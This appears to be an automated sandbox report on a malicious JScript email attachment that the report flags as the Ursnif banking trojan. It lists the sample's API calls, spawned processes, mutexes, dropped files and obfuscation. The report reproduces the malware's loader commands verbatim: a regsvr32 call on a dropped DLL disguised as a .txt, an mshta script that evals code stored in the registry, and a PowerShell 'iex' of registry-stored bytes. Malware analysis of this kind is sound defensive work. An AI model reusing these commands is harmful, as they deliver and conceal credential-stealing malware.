Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C113E GetProcAddress,NtCreateSection,memset,4_2_733C113E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C1652 NtMapViewOfSection,4_2_733C1652
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C2765 NtQueryVirtualMemory,4_2_733C2765
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D104C NtCreateSection,4_2_004D104C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D1EAA NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_004D1EAA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D25BE NtMapViewOfSection,4_2_004D25BE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA5CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,4_2_04AA5CD8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA75B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_04AA75B3
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ABCEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,4_2_04ABCEA7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA668C NtMapViewOfSection,4_2_04AA668C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,4_2_04AA476B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AC0170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,4_2_04AC0170
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB02DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_04AB02DF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ABCA3E GetProcAddress,NtCreateSection,memset,4_2_04ABCA3E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB8A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,4_2_04AB8A30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ABA27A NtQueryInformationProcess,4_2_04ABA27A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ABA395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,4_2_04ABA395
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB93CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_04AB93CD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA4D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,4_2_04AA4D66
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ABC7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,4_2_04ABC7BD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ABB07A NtQuerySystemInformation,RtlNtStatusToDosError,4_2_04ABB07A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AAA99C NtGetContextThread,RtlNtStatusToDosError,4_2_04AAA99C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB7933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_04AB7933
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB4968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError,4_2_04AB4968
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB8A15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,4_2_04AB8A15
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB73D6 memset,NtQueryInformationProcess,4_2_04AB73D6
Source: C:\Windows\System32\control.exeCode function: 15_2_00324AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,15_2_00324AD0
Source: C:\Windows\System32\control.exeCode function: 15_2_00308AD8 NtSetInformationProcess,CreateRemoteThread,15_2_00308AD8
Source: C:\Windows\System32\control.exeCode function: 15_2_00322DC0 NtQueryInformationProcess,15_2_00322DC0
Source: C:\Windows\System32\control.exeCode function: 15_2_00341004 NtProtectVirtualMemory,NtProtectVirtualMemory,15_2_00341004
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ABB254 CreateProcessAsUserW,4_2_04ABB254
Detected potential crypto functionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C25444_2_733C2544
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004DAA844_2_004DAA84
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D835E4_2_004D835E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D172E4_2_004D172E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AC6D184_2_04AC6D18
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AC15704_2_04AC1570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AC1D5A4_2_04AC1D5A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB2EDE4_2_04AB2EDE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AC26134_2_04AC2613
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB3F8C4_2_04AB3F8C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA6F344_2_04AA6F34
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB27784_2_04AB2778
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AACF554_2_04AACF55
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB10DE4_2_04AB10DE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AADB4A4_2_04AADB4A
Source: C:\Windows\System32\control.exeCode function: 15_2_003279AC15_2_003279AC
Source: C:\Windows\System32\control.exeCode function: 15_2_0032555015_2_00325550
Source: C:\Windows\System32\control.exeCode function: 15_2_0030682C15_2_0030682C
Source: C:\Windows\System32\control.exeCode function: 15_2_0030C85015_2_0030C850
Source: C:\Windows\System32\control.exeCode function: 15_2_003158F415_2_003158F4
Source: C:\Windows\System32\control.exeCode function: 15_2_0030812815_2_00308128
Source: C:\Windows\System32\control.exeCode function: 15_2_0030D17815_2_0030D178
Source: C:\Windows\System32\control.exeCode function: 15_2_0032F94415_2_0032F944
Source: C:\Windows\System32\control.exeCode function: 15_2_0030D9B015_2_0030D9B0
Source: C:\Windows\System32\control.exeCode function: 15_2_003011A015_2_003011A0
Source: C:\Windows\System32\control.exeCode function: 15_2_003071CC15_2_003071CC
Source: C:\Windows\System32\control.exeCode function: 15_2_0032F21415_2_0032F214
Source: C:\Windows\System32\control.exeCode function: 15_2_0032AA0C15_2_0032AA0C
Source: C:\Windows\System32\control.exeCode function: 15_2_0030A2B415_2_0030A2B4
Source: C:\Windows\System32\control.exeCode function: 15_2_00302AB515_2_00302AB5
Source: C:\Windows\System32\control.exeCode function: 15_2_0032DA9415_2_0032DA94
Source: C:\Windows\System32\control.exeCode function: 15_2_00309B3415_2_00309B34
Source: C:\Windows\System32\control.exeCode function: 15_2_0031231815_2_00312318
Source: C:\Windows\System32\control.exeCode function: 15_2_0032935815_2_00329358
Source: C:\Windows\System32\control.exeCode function: 15_2_0032DB9015_2_0032DB90
Source: C:\Windows\System32\control.exeCode function: 15_2_00313B9415_2_00313B94
Source: C:\Windows\System32\control.exeCode function: 15_2_0032B3F015_2_0032B3F0
Source: C:\Windows\System32\control.exeCode function: 15_2_0031F3CC15_2_0031F3CC
Source: C:\Windows\System32\control.exeCode function: 15_2_00326C2C15_2_00326C2C
Source: C:\Windows\System32\control.exeCode function: 15_2_00317C7015_2_00317C70
Source: C:\Windows\System32\control.exeCode function: 15_2_0030B47415_2_0030B474
Source: C:\Windows\System32\control.exeCode function: 15_2_00312C5815_2_00312C58
Source: C:\Windows\System32\control.exeCode function: 15_2_0031BC5C15_2_0031BC5C
Source: C:\Windows\System32\control.exeCode function: 15_2_0032A52015_2_0032A520
Source: C:\Windows\System32\control.exeCode function: 15_2_0032E52015_2_0032E520
Source: C:\Windows\System32\control.exeCode function: 15_2_00310D0815_2_00310D08
Source: C:\Windows\System32\control.exeCode function: 15_2_0032CD4815_2_0032CD48
Source: C:\Windows\System32\control.exeCode function: 15_2_0032FE6015_2_0032FE60
Source: C:\Windows\System32\control.exeCode function: 15_2_0031CE4015_2_0031CE40
Source: C:\Windows\System32\control.exeCode function: 15_2_00328E4015_2_00328E40
Source: C:\Windows\System32\control.exeCode function: 15_2_0030264415_2_00302644
Source: C:\Windows\System32\control.exeCode function: 15_2_00322EBC15_2_00322EBC
Source: C:\Windows\System32\control.exeCode function: 15_2_0030FE8815_2_0030FE88
Source: C:\Windows\System32\control.exeCode function: 15_2_00325EFC15_2_00325EFC
Source: C:\Windows\System32\control.exeCode function: 15_2_0032BECC15_2_0032BECC
Source: C:\Windows\System32\control.exeCode function: 15_2_0032873C15_2_0032873C
Source: C:\Windows\System32\control.exeCode function: 15_2_003307B815_2_003307B8
Source: C:\Windows\System32\control.exeCode function: 15_2_00306F8415_2_00306F84
Source: C:\Windows\System32\control.exeCode function: 15_2_0031FFF015_2_0031FFF0
Source: C:\Windows\System32\control.exeCode function: 15_2_0032DFC415_2_0032DFC4
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: job_attach_t9o.jsInitial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winJS@19/18@4/1
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB6887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,4_2_04AB6887
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{BF63D8CB-121E-49A6-1463-668D8847FA11}
Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{DB802072-7EC0-C5ED-603F-92C994E3E60D}
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\iRbAiisnfBO.xCyMOBJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample might require command line argumentsShow sources
Source: regsvr32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\job_attach_t9o.js'
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82950 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82956 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txtJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82950 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82956 /prefetch:2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: job_attach_t9o.jsStatic file information: File size 1587553 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000002.1271938700.0000000007010000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000004.00000003.1198870147.00000000059E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000004.00000003.1198870147.00000000059E0000.00000004.00000001.sdmp
Source: Binary string: c:\All\Cloud\Stay\case\Dance\Took\Figureparagraph.pdb source: regsvr32.exe, ZyQNToG.txt.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000002.1271938700.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
JScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt");
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AB6450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,4_2_04AB6450
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C2533 push ecx; ret 4_2_733C2543
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C24E0 push ecx; ret 4_2_733C24E9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004DAA73 push ecx; ret 4_2_004DAA83
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004DA740 push ecx; ret 4_2_004DA749
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AC6D07 push ecx; ret 4_2_04AC6D17
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AC69A0 push ecx; ret 4_2_04AC69A9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ACBA98 push edx; ret 4_2_04ACBAAD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ACBA74 push edx; retn 0002h4_2_04ACBA75
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04ACBA4E push ds; retn 0002h4_2_04ACBA69
Source: C:\Windows\System32\control.exeCode function: 15_2_0031B849 push 3B000001h; retf 15_2_0031B84E

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ZyQNToG.txtJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ZyQNToG.txtJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 4740, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
